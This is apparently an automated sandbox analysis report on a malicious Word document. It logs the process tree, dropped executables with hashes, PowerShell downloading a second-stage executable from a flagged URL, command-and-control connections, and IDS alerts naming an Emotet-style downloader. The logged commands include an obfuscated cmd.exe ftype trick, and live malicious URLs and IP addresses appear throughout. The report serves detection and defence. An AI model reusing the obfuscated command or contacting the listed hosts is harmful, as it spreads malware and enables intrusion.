3032 | C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=KHFN tokens=2" %5 IN ('ftype^|find "mdFi"') DO %5 " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1336 | C:\Windows\system32\cmd.exe /c ftype|find "mdFi" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3724 | C:\Windows\system32\cmd.exe /S /D /c" ftype" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3800 | find "mdFi" | C:\Windows\system32\find.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (grep) Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2492 | Cmd | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3344 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR911A.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3344 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E63D3182.jpg | — | |
MD5:— | SHA256:— | |||
2752 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VBS90MINKX5TMZW7DMRL.temp | — | |
MD5:— | SHA256:— | |||
2752 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19a975.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2752 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
3680 | 643.exe | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | executable | |
MD5:FAB33D99A263650FB24018CAB7D65AC9 | SHA256:785C2D79490E3302C18E618BEF73D3DB5EDC4FC6C2A4323D53F45858878208B2 | |||
3344 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:B63E0CADFFAD2BE15CACE5098449DE7D | SHA256:0C4292C028F0E13DB0AC7C146510D071B680F092A5576337DB213B97E3A17A6A | |||
3344 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$C-281704.doc.xml | pgc | |
MD5:EF7A674F7A814C12E71152BBA3AA10D5 | SHA256:AAAF6F6B678872AF070FDCFAB2DA91040BB582522DCA86C336E140DDB8027E08 | |||
3344 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:2A7426FD64131C8A0EB0B5A35EDC4452 | SHA256:92CC5AD6E3E74D05432F6AD5C8199CDAB483E6C39C8238823EECA2F67DFA76E3 | |||
2752 | powershell.exe | C:\Users\admin\AppData\Local\Temp\643.exe | executable | |
MD5:FAB33D99A263650FB24018CAB7D65AC9 | SHA256:785C2D79490E3302C18E618BEF73D3DB5EDC4FC6C2A4323D53F45858878208B2 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2104 | wabmetagen.exe | GET | — | 206.248.110.184:8080 | http://206.248.110.184:8080/ | PR | — | — | malicious |
2752 | powershell.exe | GET | 301 | 213.186.33.17:80 | http://www.apf-entreprises80.com/gH9Eq6Qp2qBAsbN | FR | html | 257 b | malicious |
2752 | powershell.exe | GET | 200 | 213.186.33.17:80 | http://www.apf-entreprises80.com/gH9Eq6Qp2qBAsbN/ | FR | executable | 560 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2104 | wabmetagen.exe | 182.180.170.72:22 | — | Pakistan Telecom Company Limited | PK | suspicious |
2104 | wabmetagen.exe | 206.248.110.184:8080 | — | — | PR | malicious |
2752 | powershell.exe | 213.186.33.17:80 | www.apf-entreprises80.com | OVH SAS | FR | malicious |
Domain | IP | Reputation |
---|---|---|
www.apf-entreprises80.com |
| malicious |
dns.msftncsi.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
2752 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2752 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
2752 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2752 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2752 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |